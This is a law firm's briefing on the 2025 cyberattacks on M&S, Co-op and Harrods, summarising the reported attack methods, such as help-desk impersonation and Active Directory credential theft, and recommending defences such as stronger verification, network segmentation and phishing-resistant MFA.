M&S, Co-op and Harrods cyberattacks: What went wrong?

Each has fallen victim to highly coordinated cyberattacks that have disrupted operations, compromised data and raised serious questions about the resilience of enterprise cybersecurity strategies.  

So what exactly went wrong, and – more importantly – what can your organisation do to avoid a similar fate? 

What Happened?

Marks & Spencer (M&S): Threat actors linked to the Scattered Spider group infiltrated M&S’s systems as early as February 2025. They reportedly exfiltrated the NTDS.dit file from the company’s Active Directory, a critical database that stores all user accounts, password hashes and directory information for the entire Windows domain, including usernames, group memberships and system structure. The threat actors were then able to extract and crack the hashed passwords offline, allowing them to escalate privileges and move laterally across internal systems. Once elevated access was obtained, DragonForce ransomware was deployed across critical VMware ESXi infrastructure, disrupting online orders, payments and logistics. Estimated losses have already run into the millions. 

Co-op: In what appears to be a related campaign, threat actors targeted the Co-op through social engineering, impersonating employees and manipulating IT help desks into resetting passwords, ultimately gaining unauthorised access across multiple systems. The Co-op was forced to shut down several internal systems to contain the breach, with it potentially compromising the personal data of approximately 20 million Co-op members. 

Harrods: Shortly after the previous attacks, Harrods was reportedly struck by threat actors claiming to be part of what appears to be the same co-ordinated campaign. While at the time of writing, details about this attack are still emerging, we can see that it appears to share similar tactics with the Co-op breach: identity fraud, phishing and IT desk impersonation. Investigations into the impact on operations and customer data are still ongoing. 

What Went Wrong?

These incidents expose several recurring vulnerabilities: 

  1. Weak Help Desk Protocols – In both the Co-op and Harrods cases, threat actors gained entry by manipulating IT support staff. Poor verification processes for password resets provided an accessible entry point for the threat actors to pose as legitimate employees trying to regain access to their accounts. 
  2. Poor Network Segmentation – Once inside, the threat actors were able to move laterally within the internal networks, suggesting insufficient segmentation and monitoring. 
  3. Credential Theft – The M&S attack put a spotlight on the critical risk associated with inadequately protected Active Directory systems. Once the threat actors obtained the NTDS.dit file, containing password hashes for all domain users, it was only a matter of time before they would gain access to privileged accounts. 
  4. Delayed Detection – In each case, threat actors were reportedly in the system for extended periods of time before being discovered, giving them ample opportunity to cause damage and exfiltrate sensitive data. 
  5. Limited Multi-Factor Authentication (MFA) – Insufficient enforcement or the bypassing of MFA greatly facilitated these breaches. 

How Can You Protect Your Organisation?

  1. Strengthen Verification Protocols: Implement robust verification for IT Help desk interactions using callbacks, multi-channel confirmations or biometric / token-based verification systems. 
  2. Segment Your Network: Implement internal segmentation so that a compromised endpoint cannot freely access critical infrastructure. Use role-based access controls and restrict the ability for lateral movement where appropriate. 
  3. Monitor Critical Infrastructure: Actively monitor access to sensitive assets like Active Directory, deploy Endpoint Detection and Response (EDR) systems and regularly audit privileged access activities. 
  4. Enforce Robust MFA Policies: Ensure multi-factor authentication is enabled across all access points, especially for administrative functions. Consider phishing-resistant methods like FIDO2 tokens. While any MFA is better than none, not all types offer the same level of protection and some come with more risks than others. 
  5. Regular Staff Training: Continuously educate staff, particularly help desk employees, with realistic simulations and social engineering awareness programs. 
  6. Develop and Practice Incident Response Plans: Ensure your organisation has clearly defined and up-to-date incident response strategies. These should be regularly rehearsed, so response teams can act swiftly to contain and mitigate cyber incidents. 

The attacks on M&S, Co-op and Harrods serve as a reminder that even the most well-resourced and recognisable organisations remain vulnerable to social engineering and credential-based attacks. By learning from these high-profile breaches, your organisation can take proactive steps to harden defences, reduce exposure and respond effectively when, not if, a cyber-attack occurs.   

How can we help?

If you’re concerned about the issues raised or unsure how they apply to your organisation, we’re here to help. We can work with you to turn these insights into clear, actionable steps, helping you better understand your exposure, prioritise key risks, and strengthen your overall readiness. Get in touch with the Cyber, Data and Information Law team today to start the conversation. 

Whether you’re looking to strengthen your processes, navigate risk roadblocks or protect your business from harm, our team is armed with the guidance and tools you need to be by your side and make your business unstoppable.